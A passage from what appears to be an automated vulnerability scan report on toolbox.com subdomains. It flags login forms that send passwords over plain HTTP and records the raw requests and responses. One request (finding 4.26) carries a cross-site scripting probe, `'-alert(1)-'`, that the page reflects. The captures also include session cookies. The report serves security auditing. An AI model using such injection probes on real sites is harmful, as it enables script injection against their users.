<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.12. http://crm.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://crm.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: crm.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82725
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2ge150zsf5orj4451zm2nlzm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CRM Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.13. http://database.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://database.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: database.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 84329
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ra1d4q2rs54sn03stt4bip55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Co
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.14. http://datacenter.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://datacenter.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: datacenter.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60090
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wgr3vvq5eg30jq45klsivcfv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.15. http://datawarehouse.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://datawarehouse.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: datawarehouse.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72791
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ivrlt045uzzhvb45t5knzy55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Data Wareho
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.16. http://eai.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://eai.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: eai.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71618
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4d5wgz45zmrk1tj0f23ykr55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   EAI Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.17. http://emergingtech.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://emergingtech.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: emergingtech.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47575
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vhyrxg55jlanffvxx24ekzek; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Emerging Te
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.18. http://erp.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://erp.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: erp.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74629
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=11lky4ffifxs05zpvlu4qv55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ERP Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.19. http://finance.toolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.toolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: finance.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81717
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Finance Com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.20. http://hardware.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hardware.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: hardware.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78653
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3wjpn4yajv3hcfa0fidd3prk; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Hardware Co
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.21. http://hr.toolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hr.toolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: hr.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:55:29 GMT
X-Varnish: 485228978 485227493
Age: 1729
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 22
Cache-Control: private
Content-Length: 81247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   HR Communit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.22. http://infor.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://infor.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: infor.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54154
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=laxlg3yxtwdispubbh1xwd45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Infor Commu
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.23. http://it.toolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 90471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Communit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.24. http://it.toolbox.com/ask-a-question  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /ask-a-question

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ask-a-question HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47932
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:48:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Ask a Quest
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/ask-a-question" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.25. http://it.toolbox.com/blogs/it-blogs  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/it-blogs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/it-blogs HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76343
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/it-blogs" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.26. http://it.toolbox.com/blogs/ppmtoday  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:43:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.27. http://it.toolbox.com/blogs/ppmtoday/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63636
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.28. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/change-origins-39674

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/change-origins-39674 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68764
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Change Orig
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/change-origins-39674" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.29. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67441
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Does John S
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.30. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/dx3-data-driven-decisions-41860

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/dx3-data-driven-decisions-41860 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73174
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Dx3: Data D
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/dx3-data-driven-decisions-41860" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.31. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/elementary-school-and-saas-38160

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/ppmtoday/elementary-school-and-saas-38160 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
